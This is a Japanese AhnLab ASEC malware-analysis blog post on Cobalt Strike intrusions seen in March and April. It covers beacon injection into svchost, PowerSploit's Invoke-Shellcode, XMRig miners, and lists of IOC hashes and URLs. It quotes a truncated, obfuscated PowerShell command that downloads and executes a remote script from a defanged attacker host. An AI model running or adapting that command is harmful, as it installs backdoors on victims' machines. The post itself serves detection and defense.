AhnLab ASEC 分析チームは、ハッキングツール「Cobalt Strike」による攻撃をモニタリングしており、ここでは過去に取り上げたブログから現在までに確認された Cobalt Strike の攻撃について整理する。
4月23日に確認された攻撃を見ると、Cobalt Strike beacon が以下のようなコマンドラインを有するプロセスによって実行されていた。Cobalt Strike を利用する攻撃者は通常、正常なプロセスに偽装させるため、正常なプロセスに特定の引数まで指定してから実行し、ここに実際のバックドアである beacon をインジェクションする方法を使用している。これは、ハッキングツール Cobalt Strike で実際にサポートされている機能である。
svchost.exe -k LocalServiceNetworkRestricted
上記の beacon プロセスが実行される前は、以下のような難読化された PowerShell コマンドラインのログが確認された。
powershell.exe “$dadf=’IEX(New-Object Net.WebClient).D’;$ien=’ownloadString(”hxxp://hcut.co[.]kr/api/runtime.ps1”)’;$nv3=’IEX(New-Object Net.WebClient).Do’;$qc=’wnloadString…(以下省略)
ダウンロードされる runtime.ps1は、実際には Invoke-Shellcode.ps1であり、これは別の PowerShell ベースの攻撃ツールである PowerSploit および Empire で提供される PowerShell スクリプトである。Invoke-Shellcode は名前の通り、引数としてシェルコードのペイロードを受け取って実行する機能を担当している。すなわち、Invoke-Shellcode.ps1を通じて Cobalt Strike をインストールしたものと推定される。
– runtime.ps1 : Invoke-Shellcode.ps1 ( ダウンロードアドレス:hxxp://hcut.co[.]kr/api/runtime.ps1 )
インストールが完了した後は、以下のように情報収集およびコインマイナーマルウェアを生成した履歴が確認できる。
– na.exe:ハードウェア情報の獲得
– 1.exe:XMRig コインマイナーインジェクター。正常動作不可。
– 2.exe:XMRig コインマイナーインジェクター。正常動作不可。
参考に、感染環境では過去にもすでに Cobalt Strike およびコインマイナーマルウェアがインストールされた履歴が存在する。
– 2008.exe:Cobalt Strike Stager (beacon ダウンロードアドレス:hxxp://103.39.108[.]20:2008/cDIl)
– 2008a.exe:Cobalt Strike Stager (beacon ダウンロードアドレス:hxxp://103.39.108[.]20:2008/eZ5h)
– bits_se.exe:Cobalt Strike Stager (beacon ダウンロードアドレス:hxxp://103.39.108[.]20:2008/cDIl)
– k64.src:Cobalt Strike Stager (beacon ダウンロードアドレス:hxxp://www.pc1024[.]net:3322/NDaj)
– shellcode.dll:Cobalt Strike Stager (beacon ダウンロードアドレス:hxxp://103.39.108[.]20:2008/yGYC)
– 51032u.exe:コインマイナーインストーラー
– avmi.exe:XMRig コインマイナー
– xmrig.exe:XMRig コインマイナー
– svchost.exe:NSSM サービス管理者
次に、3月16日に確認された事例がある。配布された企業は、特定企業の系列会社と推定される。PowerShell プロセスが特定フォルダーにある不正なスクリプト(%temp%\tmp5O91.ps1)を実行し、beacon をダウンロードしようとする行為が補足された。
このスクリプトは Base64 デコードのプロセスを飛ばして XOR(0x35)演算を行い、シェルコードをメモリにロードする。
このシェルコードは beacon をダウンロードする「Stager」形式であり、最下段の C2(pilottrustme[.]top, 54.238.214[.]219)から beacon のダウンロードを試みる。しかし現在は接続ができないため、beacon に対する情報を確認することができない。
最後に3月26日、韓国国内の某大学で感染が確認された。確認されたサンプルは msvcruntime.exe という名前で Time Date Stamp(ビルド時間)の値がないまま配布されており、オープンソースパッカーである「PEzor」を使用して、最終的に特定のシェルコードを実行している。最終的に実行されるシェルコードは beacon をダウンロードするシェルコードであり、Cobalt Strike ではこれを「Stager」ペイロード方式と呼ぶ。
当該シェルコードが接続する C2 ドメインは、左下の「oxoo[.]cc」である。しかし、現在は「404 Not Found」エラーで接続できず、beacon をダウンロードすることができないため、この情報を確認することができない。
AhnLab 製品では、Cobalt Strike を活用し、初期のペネトレーション段階から内部拡散時に使用される beacon のバックドアについて、プロセスのメモリ基盤の検知方式とビヘイビア検知技術を所有している。
[ファイル検知]
– Trojan/PowerShell.InvokeShell (2021.04.27.00)
– Infostealer/Win.Sysinfo.C4439416 (2021.04.26.03)
– CoinMiner/Win.XMRig.C4439427 (2021.04.27.00)
– Trojan/Win32.CobaltStrike.R329694 (2020.11.26.06)
– Malware/Win32.Generic.C1883131 (2017.03.27.01)
– Trojan/Win32.RL_Generic.R292199 (2019.09.20.01)
– Trojan/Win32.Wacatac.R355370 (2020.11.11.02)
– CoinMiner/Win.Agent.C4439419 (2021.04.26.03)
– Trojan/Win64.XMR-Miner.R226842 (2019.12.11.01)
– Unwanted/Win.NSSM.C4439418 (2021.04.26.03)
– Trojan/PS.Cobalt (2021.04.06.00)
– Trojan/Win.CobaltStrike.C4399063 (2021.04.01.01)
[IOC 情報]
ファイル
– runtime.ps1 : 7facee76cab5717349fe6c2d913a1961
– na.exe : b9a376b33f6307c8c2669360ae2dae01
– 1.exe : 7f2fb6bac0ecd067cf1f183ee07bc95c
– 2.exe : d8b503bedaa4077fa566c25c6c4b8f32
– 2008.exe : ff2af38bf23d9a6b1f8da12626c5f6a4
– 2008a.exe : 9917e7ef06e7fc2761144c4abef0cdc2
– bits_se.exe : 6d853d078b9865dd3d6aba653d42083b
– k64.src : 179e60db8beeecfe14b2c1ea922e65e3
– shellcode.dll : 17730a73ffbb0e6145658783e5207d6d
– 51032u.exe : 6c1feef64ae04ce2f45b703706c43ef5
– avmi.exe : a2074ca640b5a57662622e49ac742bb1
– xmrig.exe : 0ea5d36707f6d07b82a1f9d707d4c913
– svchost.exe : 6e64c6b59e22247b0f07db49ea651cc8
– tmp5O91.ps1 : d782dd504419ef0699d65cfa8c673700
– msvcruntime.exe : f990c4df6a580794cb6fd1d4fafe64b8
URL
– hcut.co[.]kr/api/runtime.ps1
– 103.39.108[.]20:2008/cDIl
– 103.39.108[.]20:2008/eZ5h
– 103.39.108[.]20:2008/yGYC
– www. pc1024[.]net:3322/NDaj
– pilottrustme[.]top
– oxoo[.]cc
Categories:マルウェアの情報